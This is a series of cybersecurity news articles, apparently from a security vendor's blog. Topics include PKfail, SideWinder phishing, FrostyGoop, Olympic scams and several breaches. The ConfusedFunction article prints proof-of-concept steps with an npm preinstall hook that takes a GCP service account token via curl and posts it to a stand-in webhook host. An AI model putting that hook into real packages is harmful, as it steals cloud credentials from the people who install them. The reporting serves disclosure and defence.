A critical security flaw dubbed 'PKfail' has exposed vulnerabilities in the Secure Boot process across hundreds of device models, uncovering a major weaknesses in the firmware supply chain. The flaw stems from the misuse of test Platform Keys (PK) in production devices, potentially allowing attackers to bypass Secure Boot protections. Secure Boot, a cornerstone of platform security, relies on cryptographic keys to verify the integrity of boot processes. However, researchers revealed that many manufacturers are using untrusted keys provided by Independent BIOS Vendors (IBVs) instead of generating their own secure keys.

Scope and Impact of PKfail

The Binarly REsearch Team analysis of firmware images from major device vendors revealed alarming statistics. They discovered that over 10% of firmware images in their dataset use untrusted Platform Keys, and nearly 900 device models are affected with the vulnerability, which has existed in devices for 12 years, starting from May 2012 to June 2024. They implications of the vulnerability can be severe, as attackers who gain access to compromised private keys could potentially bypass Secure Boot, allowing them to run malicious code during the boot process. This vulnerability affects both x86 and ARM devices, making it a cross-silicon issue. In 2023, the research team had discovered a significant supply chain security incident when leaked private keys from Intel Boot Guard distributed by Intel in their reference code were used in production. The team also found that the private key from American Megatrends International (AMI) related to the Secure Boot "master key," called Platform Key (PK), was publicly exposed in a data leak. The devices corresponding to this key are still deployed in the field, and the key is also being used in recently released enterprise devices. This vulnerability allows attackers to bypass Secure Boot and run malicious code during the boot process, compromising the entire security chain from firmware to the operating system.

Mitigating Threat and Addressing Supply Chain

The PKfail issue highlights multiple security problems related to device supply chain security, including poor cryptographic materials management, the use of non-production cryptographic keys, and the lack of rotation of platform security cryptographic keys per product line. To mitigate these risks, device vendors must implement stronger cryptographic practices, including secure key generation and management. Users should stay vigilant for firmware updates and apply security patches promptly. The researchers have provided a free website API to check if devices are affected by PKfail.

A data breach at the Donald W. Wyatt Detention Facility in Central Falls, Rhode Island, has impacted nearly 20,700 people, far exceeding initial estimates, according to a class-action lawsuit filed in U.S. District Court last week. The breach, which occurred on Nov. 2, 2023, was initially reported to have affected 1,984 individuals. However, a recent letter from the facility included in the lawsuit reveals the number of victims could be as high as 20,693. Jacob Hellested, who applied for a job at the facility but never worked there, filed the lawsuit on July 19 after receiving notification of the breach eight months after it occurred.

Wyatt Detention Facility Delayed Breach Notification

The Donald W. Wyatt Detention Facility, established in 1993, was America's first publicly owned and privately operated adult secure correctional facility. The lawsuit alleges that the facility's "poor data security" led to thousands of people's personal information being posted on the dark web. This information potentially includes birthdates, phone numbers, addresses, Social Security numbers and financial data. Peter Wasylyk, Hellested's attorney, stated that the long delay in notification prevented victims from taking timely action to protect themselves. He added that the affected individuals may feel the consequences of this data breach for years to come. A letter sent to victims in July revealed that the actual number of affected individuals was significantly higher than initial estimates. According to the letter, 12,890 detainees, 185 outside vendors, and 7,618 current, former, and potential staff were affected by the breach.

Facility Response and Mitigation Efforts

The Central Falls Detention Facility Corporation, which operates the publicly-owned 770-bed facility, acknowledged the cyberattack in a statement. They expressed regret for any inconvenience caused and stated that eligible individuals are entitled to receive free credit monitoring at the facility's expense. The facility has partnered with a legal services company to provide five years of free Equifax credit monitoring to those affected by the breach. However, the lawsuit argues that this response is insufficient given the potential long-term impact on victims' personal and financial well-being. The facility's attorney has declined to comment further on the matter due to the ongoing litigation. The Wyatt Detention Facility, which opened in 1993, has been used by both the U.S. Marshal Service and Immigration and Customs Enforcement Agency.

Researchers have uncovered a new campaign by SideWinder, a nation-state threat actor believed to originate from India that has been active since 2012. Analysis of phishing emails suggests the campaign is targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. The attack's first stage implies that the group is targeting Pakistan, Egypt and Sri Lanka, while the second stage indicates additional focus on Bangladesh, Myanmar, Nepal and the Maldives. Researchers believe the campaign's goal is espionage and intelligence gathering, consistent with SideWinder's previous activities.

SideWinder Tactics, Techniques, and Procedures (TTPs)

Researchers from BlackBerry Threat Research and Intelligence team noted that the SideWinder group has upgraded its infrastructure and tactics towards sophisticated email spear-phishing, document exploitation, and DLL side-loading techniques, designed to avoid detection and deliver targeted implants. The attack chain begins with a phishing email containing a malicious document with highly specific logos and themes familiar to targets, often related to specific port infrastructure. [caption id="attachment_84140" align="alignnone" width="1141"] Source: https://blogs.blackberry.com[/caption] One example mimicked a letter from the Port of Alexandria, while another impersonated the Red Sea Port Authority. The documents use emotionally charged language about topics like employee termination, alleged sexual harassment incidents or salary cuts to compel victims to open attachments immediately. [caption id="attachment_84138" align="alignnone" width="1137"] Source: https://blogs.blackberry.com[/caption] The document analyzed by the researchers uses a remote template injection technique exploiting the CVE-2017-0199 vulnerability to gain initial access to the target's system. The CVE-2017-0199 vulnerability, which was patched in 2017, is often exploited by threat actors in phishing campaigns. Next, a rich text format (RTF) file is used to download an additional malicious document containing shellcode to exploit the CVE-2017-11882 vulnerability upon access. The shellcode also checks the victim's system to see if it is a real environment or a virtual machine, ensuring that the attack chain remains undetected. [caption id="attachment_84137" align="alignnone" width="1095"] Source: https://blogs.blackberry.com[/caption] If the script passes the environment checks, additional JavaScript code is loaded from a remote server for execution.

SideWinder Obfuscation Techniques

The second stage of the attack chain utilizes an old Tor node, which is used to mask online traffic and provide anonymous web browsing. However, the delivery infrastructure for the second stage can still be identified via an 8-byte file, an RTF document returned by the C2 when outside of the targeted geographical area. The C2 also uses an old Tor node, which is used to mask online traffic and provide anonymous web browsing. However, researchers identified multiple domains with similar naming structures ready for use in the campaign.

Countermeasures and Conclusion

While the researchers were not able to obtain live samples of the JavaScript code delivered in the final stage of the campaign, they speculate that the goal of the operation is espionage and intelligence gathering based upon SideWinder's previous campaigns. The researchers emphasized the importance of patching systems, as SideWinder continues to exploit older vulnerabilities that have fixes available. They have also shared the following additional recommendations:

• Organizations that rely on Microsoft Office should take special precaution to keep all systems updated due to the exploit of CVE-2017-0199 and CVE-2017-11882 in the campaign.
• Employees should be trained to protect against phishing campaigns.
• Organizations should implement advanced email filtering solutions to protect against malicious phishing campaigns.
• Organizations should invest in advanced real-time threat detection and response solutions.

The research team continues to monitor the threat actor's operations, such as its tooling and use of malicious files, for additional insight.

A recent federal indictment accuses Ping Li, a 59-year-old resident of Wesley Chapel, Florida, of conspiring to act as an agent of the People's Republic of China (PRC) without knowledge of the Attorney General. The charges stem from his alleged cooperation with China's Ministry of State Security (MSS) over a decade-long period, during which he reportedly gathered sensitive information on various topics of interest to the Chinese government. Li faces a maximum penalty of 15 years in prison if convicted.

Allegations of Covert Activities by Ping Li

According to court documents, the PRC's Ministry of State Security (MSS) uses cooperative contacts located in countries outside of China to further their intelligence goals. These contacts assist the MSS in various ways, including conducting research on topics of interest to the PRC and providing information to the MSS. Li, a U.S. citizen who immigrated from China, allegedly worked as a cooperative contact for the MSS from since at least 2012. [caption id="attachment_83973" align="alignnone" width="2800"] Source: www.wtsp.com[/caption] In the indictment, Li is alleged to have worked for major U.S. tech companies while simultaneously serving as a "cooperative contact" for the MSS. Prosecutors claim he used anonymous online accounts to communicate with Chinese intelligence officers and even traveled to China for in-person meetings. The scope of Li's alleged activities is broad. He's accused of providing information on Chinese dissidents, pro-democracy activists, and practitioners of Falun Gong – a spiritual movement banned in China. Falun Gong is a controversial religion banned within China since 1999, and is not among the five religions officially recognized by the Chinese government. Practitioners of the religion are of particular focus by the Chinese government, as it has been deemed to be subversive and contrary to state interests. However, these charges against Li have been labelled as alleged, and the press statement includes the below disclaimer:

An indictment is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.

Corporate Espionage Concerns

The indictment also raises alarms about potential corporate espionage. Li allegedly shared information about his employers, including details about a U.S. telecommunications company's operations in China and materials from an international IT firm where he later worked. In a particularly concerning allegation, Li is accused of providing Chinese intelligence with information about hacking events targeting U.S. companies, including a high-profile breach attributed to the Chinese government. This information is alleged to include materials relating to cybersecurity training and readiness of these companies. According to the press release on the official justice.gov site, the information requested from the MSS over the years spanning 2012 to 2022 include:

•  An MSS officer requested in August 2012 for information on the practitioners of Falun Gong within the United States.
• In March 2015, Li was asked to provide details about his U.S. telecommunications employer's branch offices in China. He reportedly complied within three weeks.
• Two years later, in March 2017, an MSS officer requested a training instruction plan. Li allegedly uploaded the materials to a shared online account the following month, instructing the officer to delete them after review.
• May 2021 saw a request for information on hacking incidents targeting U.S. companies, including a high-profile breach attributed to the Chinese government. Li purportedly delivered this information within four days.
• In March 2022, Li was asked about his new employer, an international IT company, and for cybersecurity training materials. He allegedly provided this information on the same day.
• The most recent request, in June 2022, concerned an individual who had fled China for the U.S. Li reportedly responded with information about the property owners at the suspected U.S. address.

The case is under ongoing investigation from the FBI and is an example of the difficulty in countering foreign suspected espionage activities within the United States against individuals with U.S. citizenship employed as seasoned professionals.

In response to an increase in cyberattacks, Hong Kong is taking its first steps to introduce comprehensive cybersecurity legislation. The government recently unveiled a proposed framework for regulating Critical Infrastructure Operators (CIOs) and Critical Computer Systems (CCS). The proposal comes amid a wave of cybersecurity developments across Asia, including new regulations in Thailand and Singapore. Hong Kong's proposal would align with other jurisdictions that regulate critical infrastructure, such as mainland China, Australia, and the United States.

Key Elements of the Proposed Hong Kong Cybersecurity Framework

The proposed framework is designed to ensure that CIOs and CCS operate in a secure and reliable manner. A new Commissioner's Office, to be set up under the Security Bureau, will oversee the implementation of these regulations. This office will have the power to investigate incidents, issue guidelines, and conduct inspections. The key elements of the framework include: Scope of Application: The framework applies to CIOs and CCS, which are defined as organizations that own, control, or use critical computer systems. The initial eight Designated Sectors include energy, information technology, banking and financial services, land transport, air transport, maritime, healthcare services, and communications and broadcasting. Obligations: CIOs will be required to maintain an address and office in Hong Kong, establish a dedicated cybersecurity team, update the Commissioner's Office on material changes to CCS, and conduct regular security audits and risk assessments. They will also be required to participate in security drills and submit emergency response plans. CIOs will face three main categories of obligations:

• Organizational: Maintain a Hong Kong office and establish a dedicated cybersecurity team.
• Preventive: Submit security management plans and conduct regular risk assessments and audits.
• Incident Reporting and Response: Participate in security drills and notify authorities of incidents within specified timeframes.

Comparison with Other Jurisdictions

The proposed framework shares similarities with existing cybersecurity regulations in Singapore and China. For instance, both jurisdictions require CIOs to conduct regular security risk assessments and audits. However, there are also some key differences, such as the frequency and timing of security drills and incident reporting. [caption id="attachment_83938" align="aligncenter" width="760"] Source:www.mayerbrown.com[/caption]

Challenges, Uncertainties and Unresolved Questions

While the proposed framework provides a comprehensive approach to cybersecurity, there are still some unresolved issues, and many questions have been raised about the new legislation: Compliance Timeline: Organizations may have only six months to implement required measures after being designated as CIOs or CCSs. This could prove challenging, especially for larger entities that require more time for organizational changes. Sector Definitions: There's uncertainty about which organizations will fall under certain designated sectors, particularly the "information technology" category. Third-Party Providers: The framework's impact on service providers to CIOs remains unclear, as some may themselves be designated as critical infrastructure operators. Talent Shortage: Stakeholders have expressed concerns about the difficulty of hiring competent cybersecurity personnel to meet the new requirements. The government plans to introduce a bill by the end of 2024, with the legislation expected to come into force in late 2025 or mid-2026 at the latest. As Hong Kong moves forward with this initiative, balancing security needs with operational feasibility will be crucial for its success.

Researchers have discovered a vulnerability in the Google Cloud Platform (GCP) dubbed "ConfusedFunction" that affects Cloud Functions, a serverless execution environment, and Cloud Build, a CI/CD pipeline service within the platform.

ConfusedFunction Vulnerability

The vulnerability arises from the automatic attachment of a default Cloud Build service account granted with excessive permissions to Cloud Build instances that are created during Cloud Function deployment. This process happens behind the scenes and is unknown to most Google Cloud Platform users. [caption id="attachment_83886" align="alignnone" width="2122"] Source: tenable.com/blog[/caption] Tenable researchers discovered that an attacker could exploit the deployment stage by creating or updating a Cloud Function with malicious code. During deployment, the malicious code can leverage the attached service account's permissions to gain unauthorized access to other Google Cloud Platform services like Cloud Storage, Artifact Registry, or Container Registry. The researchers have shared the following steps to reproduce the attack technique through a Node.js function runtime:

• Run npm init.
• A package will be created in the current folder, modify the package.json code to the webhook attack script.

  { "name": "mypocmaliciouspackage", "version": "4.0.0","description": "poc", "main": "index.js", "scripts": {"test": "echo 'testa'", "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token');curl -X POST -d $access_token https://webhook.com"}, "author": "me", "license": "ISC" }

• Run npm publish --scope public command to push the code; the researchers caution that this code would be published to the public npm registry.
• Create a new Cloud Function or update an existing one with an identity that has adequate function permissions.
• Pick a Node.js runtime and edit the package.json with the malicious package.

  { "dependencies": { "@google-cloud/functions-framework": "^3.0.0", "mypocmaliciouspackage": "^1.0.0" } }

• Deploy and run the Cloud Function; the Cloud Build instance will then be run with the malicious package installed while the preinstalled script of the malicious package will exfiltrate the token from the default Cloud Build service account to send to the webhook.

What Google's ConfusedFunction Fix Covers

After the researchers reported the ConfusedFunction vulnerability to Google, Google Cloud Platform confirmed its existence and remediated the flaw to some extent for Cloud Build accounts created after mid-June 2024. However, these remediation efforts do not address existing Cloud Build instances. [caption id="attachment_83889" align="alignnone" width="1937"] Source: tenable.com/blog[/caption] The ConfusedFunction vulnerability highlights the problematic scenarios that may arise due to software complexity and inter-service communication in a cloud provider's services. To support and allow backward compatibility, Google Cloud Platform has not changed the privileges from Cloud Build service accounts created before the fix was implemented. This means that the vulnerability is still affecting existing instances. It’s also worth mentioning that while the Google Cloud Platform fix has reduced the severity of the problem for future deployments, it didn’t completely eliminate it. That’s because the deployment of a Cloud Function still triggers the creation of the aforementioned Google Cloud Platform services. As a result, users must still assign minimum but still relatively broad permissions to the Cloud Build service account as part of a function’s deployment.

Patch and Mitigation Strategies

Google Cloud Platform has implemented a partial fix by allowing users to choose a custom service account with limited permissions for the Cloud Build instance during deployment. This enhances security compared to the previous automatic assignment of the default service account. Here's how to mitigate the risk:

• Upgrade Cloud Functions: Ensure you're using the latest version of Cloud Functions to benefit from the fix.
• Custom Service Accounts: For existing Cloud Functions, consider replacing the legacy Cloud Build service account with a custom one with minimal necessary permissions.
• Monitor Permissions: Regularly review and adjust IAM permissions for Cloud Functions and Cloud Build instances to minimize potential attack surfaces.

In a bold move to address the country's growing concerns, President Ferdinand Marcos Jr. has announced a total ban on Philippine Offshore Gaming Operators (POGOs) in the Philippines. This decision comes after years of controversy and allegations of illegal activities linked to POGOs. In his third State of the Nation Address (SONA), Marcos emphasized the need to stop the "grave abuse and disrespect to our system of laws" and to put an end to the "panggulo" (nonsense) that has plagued the country. He also directed the Philippine Amusement and Gaming Corporation (PAGCOR) to wind down and cease POGO operations by the end of the year.

Philippines Government Helps Displaced Employees

As the ban takes effect, the Philippine government has vowed to help Filipino POGO workers find new jobs. Finance Secretary Ralph Recto assured that the government would assist Filipino POGO workers in finding new employment. "We have until the end of the year to ensure that all displaced Filipino workers will have new jobs," Recto said. He added that the Department of Finance would collaborate with the Department of Labor and Employment to provide reskilling and upskilling training. [caption id="attachment_83672" align="alignnone" width="2250"] Source: pco.gov.ph[/caption] National Economic and Development Authority Secretary Arsenio Balisacan downplayed the economic impact of the ban, noting that POGOs contributed less than 0.5% to the country's GDP in 2022. He emphasized that the social and reputational costs of hosting POGOs outweigh their economic benefits. Other government agencies, such as the Department of Social Welfare and Development (DSWD) and the Department of Labor and Employment (DOLE), have also pledged to provide assistance to affected workers. The DSWD has indicated its desire to use other shutdown POGO hubs to convert them into shelters for reached-out individuals.

Addressing Social Concerns and Illegal Activities

The Department of the Interior and Local Government (DILG) has directed local government units (LGUs) to scrutinize documents of establishments as the first line of defense in granting business permits. The DILG chief has also emphasized the importance of coordination with proper authorities to ensure that only legitimate businesses are allowed to operate. The ban comes in response to numerous reports of criminal activities linked to POGOs, including financial scams, money laundering, human trafficking and violent crimes. Marcos acknowledged that while the ban would solve many problems, it wouldn't address all issues. Department of Social Welfare and Development Secretary Rex Gatchalian outlined plans to assist both Filipino and foreign workers affected by the ban. The government will provide temporary housing, cash aid and support for those wishing to start small businesses. In light of the ban, Interior Secretary Benjamin Abalos Jr. has directed local government units to scrutinize business permit applications more closely to prevent illegal operations from continuing under different guises. As the Philippines moves to implement this significant policy change, the government faces the challenge of balancing economic considerations with social welfare and national security concerns.

Hackers have leaked internal documents stolen from Leidos Holdings Inc., a major U.S. government IT services provider, according to a source familiar with the situation. The company recently discovered the issue and believes the documents were taken during a previously disclosed breach of a third-party system it used. Leidos, which serves clients including the Defense Department, Department of Homeland Security and NASA, is investigating the matter. The company's stock initially fell more than 4% in after-hours trading on the news before recovering most of its losses.

Leidos Leak Believed to Stem From Third-Party Breach

Leidos, formed in 2013 through the acquisition of Lockheed Martin Corp.'s IT business, was the largest federal IT contractor in the 2022 fiscal year, with $3.98 billion in contract obligations, according to Bloomberg Government data. The leaked documents are believed to have originated from a breach of a Diligent Corp. subsidiary, Steele Compliance Solutions. Leidos used Diligent's system to store information from internal investigations, as noted in a June 2023 Massachusetts filing. While some purportedly leaked files were visible on a cybercrime forum, their authenticity could not be independently verified. Though the original report does not directly mention the name of the cybercrime forum, it appears to be BreachForums. [caption id="attachment_83646" align="alignnone" width="1600"] Source: BreachForums.st[/caption] [caption id="attachment_83648" align="alignnone" width="1600"] Source: BreachForums.st[/caption] A Diligent spokesperson confirmed that the leak appears to stem from a 2022 hack affecting Steele Compliance Solutions, which it acquired in 2021. The incident impacted fewer than 15 customers, including Leidos, which was initially notified in November 2022. "We promptly notified impacted customers and took immediate corrective action to contain the incident," the Diligent spokesperson said. Leidos maintains that the breach did not affect its network or any sensitive customer data. "We have confirmed that this stems from a previous incident affecting a third-party vendor for which all necessary notifications were made in 2023," a Leidos spokesperson stated.

Leidos Leak Impact and Implications

The company's extensive government contracts and the nature of the leaked documents raise concerns about potential security implications. However, the full extent of the breach and the sensitivity of the leaked information remain unclear. The company has sought to reassure its customers, including the Defense Department, the Department of Homeland Security, and NASA, that the breach did not affect its network or sensitive customer data. According to the Bloomberg article, the Pentagon, Department of Homeland Security and NASA did not yet responded to requests for comments on the incident. In another incident that occurred more than a decade ago, hackers had stolen over 24,000 files from a defense contractor associated with the Pentagon. While the Pentagon did not mention what files had been stolen due to the level of secrecy associated with its content, former Deputy Defense Secretary William J. Lynn III admitted during a speech that it involved some of the U.S.’s “most sensitive systems, including aircraft avionics, surveillance technologies.”

Security experts have stressed the importance of dark web monitoring for CEOs of businesses and enterprises of all sizes as an essential measure to prioritize the safety and integrity of their organization's digital presence. Password and data breaches shared on the dark web and in cybercriminal communities have become a common occurrence, leaving businesses vulnerable to severe consequences, including stolen bank accounts and identity theft. To combat this threat, dark web monitoring is a proactive option to help identify, detect and mitigate potential breaches before they escalate into embarrassing major security incidents.

CEOs Guide to Dark Web Monitoring

The dark web is a small part of the deep web, which is generally considered an unindexed sub-layer of the internet, ignored by or inaccessible to conventional search engines. This anonymous environment is a hub for illegal activities, including the commission and sale of sensitive data such as digital credentials and records. Dark web monitoring is a specialized process that involves searching for and monitoring the spread of records related to organization or entity information across the dark web. Using advanced algorithms and techniques, dark web monitoring tools provide enhanced detection capabilities, allowing businesses to stay ahead of cyber threats. The financial implications of a cyber attack can be severe. In 2020, DSG Retail Limited was fined £500,000 by the UK's Information Commissioner's Office after a point-of-sale system breach affected 14 million people, for example. A study conducted at King’s College London revealed that over 60% of more than 2,700 darknet sites were found to host illicit content facilitating criminal activity. It's essential for CEOs to understand the techniques and methods cybercriminals use to steal data, such as phishing, malware, and keylogging, to recognize and prevent these threats. For CEOs, the stakes are high. A single compromised password can lead to devastating consequences, from financial losses to reputational damage. With 80% of individuals reusing passwords across multiple accounts, the risk of a breach extends far beyond a single compromised system. Quick response by CEOs can be an important factor in limiting damage, and that's where dark web monitoring comes in.

The Sale of Ransomware and Malware

The dark web is a hub for the sale of ransomware malware that is used in threat campaigns. These attacks can be devastating for businesses, such as the 2017 WannaCry attack on the UK's NHS that reportedly led to it losing £92 million as well as the cancellation of over 19,000 appointments. In the same year, shipping giant A.P. Moller-Maersk suffered losses of between $200-$300 million due to the NotPetya ransomware attack, which rendered apps, laptops, and servers useless. Dark web monitoring can help counter threat posed by sale of such services among dark web forums.

The Sale of Business Data

If your business is hacked and your data stolen, it may well end up for sale on the dark web making it critical for a suitable platform providing dark web threat intelligence for corporate leaders. Hackers also sell access to breached company databases, leaving them open to the theft of everything from financial information to employees' personal details. Last year, Kaspersky researchers observed almost 40,000 dark web posts about the sale of internal corporate information, a 16% increase compared to the previous year.

The Sale of Credit Card Details

It's estimated that over 23 million credit cards are offered for sale on the dark web, which may have come from a variety of sources, including online stores' checkout processes. Marketplaces called Automated Vending Carts (AVCs) are used to sell credit card details without the buyer and seller needing to interact.

Importance of Dark Web Monitoring for CEOs

Dark web monitoring offers a strategic advantage in the ongoing battle against cybercrime. Here are some benefits of dark web monitoring for business executives.

• Detect breaches early: Identify compromised credentials before they're exploited.
• Assess vulnerabilities: Gain insights into potential weak points in security protocols.
• Enhance incident response: React swiftly to emerging threats with actionable intelligence.
• Protect executive data: Organizations can place special focus on protecting executive data through dark web monitoring tools.

Implementing a robust dark web monitoring program allows CEOs to stay ahead of potential threats, protecting their company's assets and reputation. This is crucial given the rise of ransomware-as-a-service and malware-as-a-service packages on the dark web, which enable even non-technical criminals to launch sophisticated attacks.

Building a Security Strategy

While dark web monitoring is a powerful tool, it's just one piece of a comprehensive cybersecurity strategy. CEOs should consider:

• Dark Web Monitoring: Reliable dark web risks and monitoring solutions for CEOs such as Cyble Vision or Cyble Darkweb Intelligence can be integrated into broader security strategies to provide dark web threat intelligence for corporate leaders.
• Employee education: Train staff to recognize and report potential security threats or respond to claims of breach or compromise. Dedicated staff should feel encouraged to make reports on strategic insights on dark web threats for executives.
• Multi-factor authentication: Implement additional layers of security beyond passwords to protect against leaked credentials offered for sale on the Dark Web.
• Regular security audits: Continuously assess and improve organizational defenses. By combining dark web monitoring with these broader security measures, CEOs can create a robust defense against evolving cyber threats.
• Leverage AI tools in security implementation: Incorporate AI-powered dark web monitoring solutions like Cyble’s award-winning cyber threat intelligence platform to make use of rich automated feeds. These automated feeds can help in updating dark web monitoring strategies for company CEOs.

In an era where data is a precious commodity, dark web monitoring can give CEOs critical insights to safeguard their organizations, and the peace of mind that rapid insight and response can give.  

A Russia-linked malware dubbed 'FrostyGoop' is raising alarm in the cybersecurity world due to the severe risks it poses to critical infrastructure across multiple sectors globally. FrostyGoop, which had been discovered by researchers in April 2024, has been deployed in a devastating attack on a district energy company in Ukraine, leading to the disruption of the power supply to heating services for hundreds of apartment buildings. FrostyGoop is the first ICS-specific malware with the ability to use Modbus TCP communications to directly impact operational technology, allowing its operators to potentially disrupt both legacy and modern systems. Researchers are urging enhanced ICS network visibility and monitoring to counter the malware.

FrostyGoop's Capabilities

Researchers from Dragos noted that the FrostyGoop malware had been written in Golang and compiled for Windows systems, and is able to read and write to ICS devices that often hold various registers containing crucial input, output, and configuration data with the use of the Modbus TCP protocol. A real-world incident of FrostyGoop was observed in Ukraine, where a cyberattack disrupted heating services to over 600 apartment buildings in Lviv during sub-zero temperatures. The Cyber Security Situation Center of Ukraine shared data with the researchers, reporting that attackers had sent Modbus commands to ENCO controllers, causing system malfunctions that took nearly two days to remediate. [caption id="attachment_83338" align="alignnone" width="1332"] Source: hub.dragos.com[/caption] The malware reads and writes data, while logging this output to a console or storing it in a JSON file. FrostyGoop also accepts a JSON-formatted configuration file containing information used to execute Modbus commands on a target device. Researchers had discovered a sample of the configuration file named task_test.json, with FrostyGoop accepting separate command-line arguments and distinct configuration files to specify target IP addresses and Modbus commands. The IP address in the identified sample configuration file had belonged to an ENCO control device. ENCO control devices are typically used "for process control in district heating, hot water, and ventilation systems” to monitor sensor parameters such as temperature, pressure, and insulation. The other fields within FrostyGoop malware configuration files are described below: [caption id="attachment_83337" align="alignnone" width="1856"] Source: hub.dragos.com[/caption] Modbus protocol-ready devices are widely used across all industrial sectors and organizations worldwide, making this malware a significant threat to critical infrastructure.

FrostyGoop Implications and Recommendations

Given the widespread usage of the Modbus protocol in industrial environments, the emergence of the FrostyGoop malware raises concerns across all industrial sectors. The malware's ability to evade detection from antivirus vendors demand the need for specialized OT security measures to protect against its spread. The researchers recommend implementing the following measures based on the  SANS 5 Critical Controls for World-Class OT Cybersecurity, which include:

• ICS INCIDENT RESPONSE: Researchers stressed the need for incident response plans to incorporate specialized responses for OT environments, such as special procedures to quickly isolate affected devices, analyze network traffic for unauthorized Modbus commands, and restoration of usual system operations.
• DEFENSIBLE ARCHITECTURE:  A lack of adequate network segmentation and the presence of internet-exposed controllers can leave systems vulnerable to threats like FrostyGoop. To bolster defensible architecture, industrial environments can implement industrial demilitarized zones (DMZs) and enforce strict access controls between the corporate IT network and OT environments.
• ICS NETWORK VISIBILITY & MONITORING: Persistent monitoring of network traffic such as communications over the Modbus protocol is an essential measure of detecting and responding to anomalies and suspicious behavior such as unauthorized access or unusual traffic over port 502.
• SECURE REMOTE ACCESS: Previous deployments of FrostyGoop have exploited vulnerabilities within remote access points. Remote access points can be secured through multi-factor authentication (MFA), logging/monitoring of remote connections, and implementation of virtual private networks (VPNs) to encrypt data in transit, along with regular audits to review access rights and privileges of remote access over a need-to-use basis.
• RISK-BASED VULNERABILITY MANAGEMENT: Active vulnerability management tailored to the risks associated with ICS components through regular assessments can help mitigate vulnerabilities with evidence of active exploitation.

The broad applicability of the threat presented by the FrostyGoop malware demands stronger implementations to secure critical infrastructure and industrial environments worldwide.

As the world prepares for the start of the Paris Olympics later this week, athletes and spectators alike are filled with excitement and anticipation. However, amidst the thrill of competition and camaraderie, researchers have observed various Paris Olympic scams that aim to cash in on unsuspecting visitors and internet users that seek to obtain event-related tickets and merchandise. The researchers have described various tactics involved in these scams, as well as ways to identify them and protect yourself.

Paris Olympic Scams 48GB Mobile Data Scam

With the expected influx of an estimated 15.3 million visitors to Paris, scammers are capitalizing on the huge numbers of tourists in a foreign environment by preying on their excitement and enthusiasm to steal personal and banking data through various fraudulent deals and services that are 'too good to be true. [caption id="attachment_83209" align="alignnone" width="1280"] Source: www.kaspersky.com[/caption] Researchers from Kaspersky observed various kinds of scams, with one of them involving fake mobile plans that promise 48GB of free internet to visiting tourists. Victims who fall for this scam may find themselves unable to obtain a single free megabyte after registering and filling out these forms. These forms typically collect phone numbers, personal and bank details to steal money from bank accounts. Tourists may realize potential theft very late, as they remain too preoccupied with watching Olympics events to scrutinize bank transactions. Since a 40GB mobile data plan in France costs around €11 ($12 U.S.), such giveaways remain highly implausible. Successfully scammed victims may compromise their personal information along with the stolen money.

Ticketing and Merchandise Scams

Scammers have also targeted Olympic ticket and merchandise sales. Fake ticketing websites offer a range of events, from archery to badminton, and even request personal data and consent to collect information. [caption id="attachment_83210" align="alignnone" width="1280"] Source: www.kaspersky.com[/caption] Several phishing websites were observed claiming to sell Olympics merchandise under great deals while actually attempting to steal money and personal information. To avoid falling victim to these scams, researchers recommend sticking to the official Olympics website for ticket purchases and be wary of suspicious sites such as strangers[.]ope, which offers cheap merch such as keychains, commemorative coins, magnets, and scarves at significantly discounted prices. [caption id="attachment_83212" align="alignnone" width="1280"] Source: www.kaspersky.com[/caption] These sites often appear legitimate, with integrated pop-ups that request visitor consent to collect personal data and use web tracking cookies. These sites often link to their own “privacy policies,” which lead the unsuspecting victim to unwittingly share sensitive data with scammers.

Protecting Yourself from Olympic Scams

To stay safe during the Olympics and avoid ticketing, merchandise and giveaway scams, the researchers recommend the following tips:

• Use a virtual card with a spending limit for online purchases
• Turn on two-factor authentication wherever possible
• Be cautious of 'too good to be true' offers and gifts from strangers
• Stick to official sources for ticket purchases and merchandise
• Use of a reputable antivirus software protection.

Security researchers expected a rise in scams as the Olympic events got nearer, with one Russian AI-powered disinformation campaign attempting to tarnish the image of the Olympic events starting almost a year before before the games began.

A Suffolk County ransomware attack has left a lasting impact on the community, with the county approving over $25 million in spending to recover from the devastating effects of the cyberattack. The attack, which took place on September 8, 2022, exposed the personal information of about 470,000 residents and 26,000 past and current employees of the Long Island, New York community, crippled police dispatch services for weeks, and shut down the county's main website for months.

Staggering Price of Recovery for Suffolk County

The $25.7 million figure, which includes multiyear contracts through the end of this year, dwarfs the $5.4 million officials frequently cited in the attack's immediate aftermath. This substantial sum doesn't even account for thousands of hours of employee overtime or additional non-technology expenses related to the incident, such as legal fees. County officials have defended the spending, citing the need to secure county documents and information, and to prevent future attacks. However, critics have raised concerns about the lack of transparency and oversight in the spending process. Suffolk County Comptroller John Kennedy, a Republican and longtime political rival of former County Executive Steve Bellone, has called for a review of the spending and accused the Bellone administration of spending $13.8 million on products that either were not needed or never deployed. Key expenditures in the Bellone administration's recovery efforts include:

• $8.1 million to California-based security vendor Palo Alto Networks
• $3.18 million for an "umbrella" support agreement through 2025
• $1.67 million for forensic investigation and remediation efforts

The attack's impact was far-reaching, shutting down the county's main website for months and affecting payment systems, public records access, and online testing systems.

Controversy and Calls for Investigation

First-year Suffolk County Executive Edward P. Romaine has also called for a review of the spending and has asked for a select committee to investigate how the money was spent. Romaine stated, "I wish I had that $26 million to spend on hardening the current county network." The county is now working to improve its cybersecurity posture to qualify for cyber insurance for the first time in its history. Romaine claimed that assessing the actual cost of the cyberattack may be difficult, stating that his administration's investigation was hampered by lack of records maintained during the course of the recovery of efforts. Romaine alleged that some of these records had been removed or destroyed before his administration had taken over. Romaine stated, “When I heard they had spent $27 million between September of 2022 and December of 2023, I said, 'Well, what did you get for your money? Where is it?' He added, “It’s hard to find because a lot of the records were erased.” As Suffolk County continues to grapple with the fallout and costs associated with the ransomware attack as well as the subsequent controversy on spending, the incident serves as a stark reminder of the potentially astronomical costs and long-lasting impacts of cybersecurity breaches on local governments.

